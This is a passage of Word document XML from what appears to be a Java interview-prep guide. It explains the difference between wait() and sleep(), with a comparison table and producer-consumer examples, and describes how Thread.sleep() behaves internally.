            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78BCCD9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nly the locked object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E27D84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ll instances of the class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D42B208" w14:textId="7ACCA436" w:rsidR="00912F46"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45EFA">
          <v:rect id="_x0000_i1823" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954696E" w14:textId="77777777" w:rsidR="00E928B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E928B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc197867492"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between wait and sleep?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="306EEAF7" w14:textId="56E1F3DB" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B"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 wait() and sleep() methods are both used in multi-threaded programming in Java, but they serve different purposes and have different behaviors. Here's a breakdown of their differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38C6EB"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wait() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F340042"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Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FACA7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Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inter-thread communication</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It makes the current thread wait until another thread sends a signal (usually by calling notify() or notifyAll() on the same object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783696B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wait() can only be called from a synchronized block or method. When wait() is invoked, the thread gives up the lock it holds and enters the "waiting" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141CA7E"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Release Lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yes, when a thread calls wait(), it releases the lock and enters the waiting state. It will resume execution only when another thread calls notify() or notifyAll() on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34022B1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waiting" state and will remain there until it's notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C4A6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waiting on wait() can be interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E002A76"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1769DC2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ect) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5330154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conditionNotMet) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADB68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ect.wait();  // Makes the thread wait until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F986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FC5A484"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C454F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sleep() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D3D56"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Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F708A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Causes the current thread to </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pause execution</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a specified amount of time (in milliseconds or nanoseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812A9AE"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sleep() does not require the thread to hold any lock, and it is used for making a thread sleep for a certain duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0463F5"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Release Lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> No, when a thread calls sleep(), it </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not release any locks</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it holds. The thread is simply paused for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B8F7C"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timed waiting" state and remains paused for the specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3C6DF4"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sleeping via sleep() can be interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252DE5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20279781"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29EBEDA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1000);  // Pauses the current thread for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A006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29BF5C1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2D3CE04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137502A6"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8"/>
        <w:gridCol w:w="4373"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="0789063E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AF361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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F5810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ait()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2664E3E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sleep()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="7420476E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC137C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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4585195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Object class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E2B09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Thread class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="54F9D655" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15614FA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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5138B9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Used for inter-thread communication (waiting for a signal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082A2C8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auses the execution of the current thread for a specified period</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="10CC4E2A" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA05EB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 Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="165D37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leases the lock when waiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="111FEC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Does not release the lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="6F60BF6B" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08DF64F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ynchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3245E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Must be called from a synchronized block/method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB0A2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be called from anywhere (no synchronization required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="03831B89" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9C6EF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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255B01A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waiting" state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5C505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timed waiting" state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="5F92032E" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57C408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InterruptedException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169626E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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="195EA94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r>
      <w:tr w:rsidR="004E218C" w:rsidRPr="004E218C" w14:paraId="7B944D08" w14:textId="77777777" w:rsidTr="00584C4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F90E07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Notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7401010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quires another thread to call notify()/notifyAll() to resume execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6590B59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No need for notification to resume execution (resumes automatically after sleep time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="035C158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hen to Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3C6EB"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154BBA2"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wait() and notify() in a Producer-Consumer Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF329C" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread produces items and adds them to a buffer, while a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread consumes them. The consumer waits if the buffer is empty, and the producer waits if the buffer is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E354EB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Buffer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E194C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int item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7D0A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boolean isEmpty = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB3F06" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24ADAC2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void produce(int item) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B278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1ACDB37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not empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A8B6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2740BCB"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is.item = item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F56F3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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8969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consumer that the item is produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0675807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64CD05E7" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="004E218C" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2868581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int consume() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460951A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6E8DB2C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empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1070F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ACA39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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B183C4D"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producer that the buffer is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE0CB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item;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBCCC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B12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77C0BD8"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sleep() to Simulate Delays in Thread Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF2EB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Worker extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F123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void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223BBB7A"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689400D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Sleep for 2 seconds before doing work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F07F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ystem.out.println("Task done after sleep!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75621EE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50484D3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00C669E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6D8BA1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36837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020A767" w14:textId="77777777" w:rsidR="00584C4B" w:rsidRPr="00CE4B95" w:rsidRDefault="00584C4B" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, </w:t>
      </w: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is used for inter-thread communication where one thread needs to wait for another to notify it, while </w:t>
      </w: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xml:space="preserve"> is used to pause a thread for a fixed period, without releasing the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F7C6B3" w14:textId="75B8A8F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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFA55" w14:textId="07A34155" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00245DE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc197867493"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Thread.sleep() method, and what does it do internally</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w14:paraId="28CC193F" w14:textId="4CF449E4" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Thread.sleep() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F15E6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sleep() method is a static method in the Thread class in Java, and it is used to pause the execution of the current thread for a specified period (in milliseconds or nanoseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE76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urpose of Thread.sleep():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD795E2"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causes the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>currently executing thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sleep (pause execution)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a given duration, allowing other threads to execute or allowing time for system resources to be used elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DC695"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typical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or for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pausing the thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a fixed time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D826E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Method Signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5977E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throws InterruptedException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558FE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int nanos) throws InterruptedException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D450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arameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEC009"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millis</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of milliseconds the thread should sleep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA21F1"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nanos</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional): The additional time in nanoseconds to be added to the millis. This is used when you want more precise control over the sleep time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054DA0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at Does It Do Internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C9F86"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read.sleep() is called, the current thread moves to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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0A9E0"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The thread does not release any locks it holds while sleeping (i.e., unlike wait() or notify(), it does not require synchronization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41DA2E"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thread will remain in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 for the specified duration or until it's </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755BEE73"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elapses, the thread becomes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gain and is eligible to be scheduled for execution by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7A684"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 State During Sleep:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BEFCC"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a thread enters sleep(), it is placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"TIMED_WAITING"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB106A"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The thread remains in this state for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141B243"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has passed, it transitions back to the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where it can be executed again by the thread scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706082A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Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A04D"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Does not release any locks</w:t>
      </w:r>
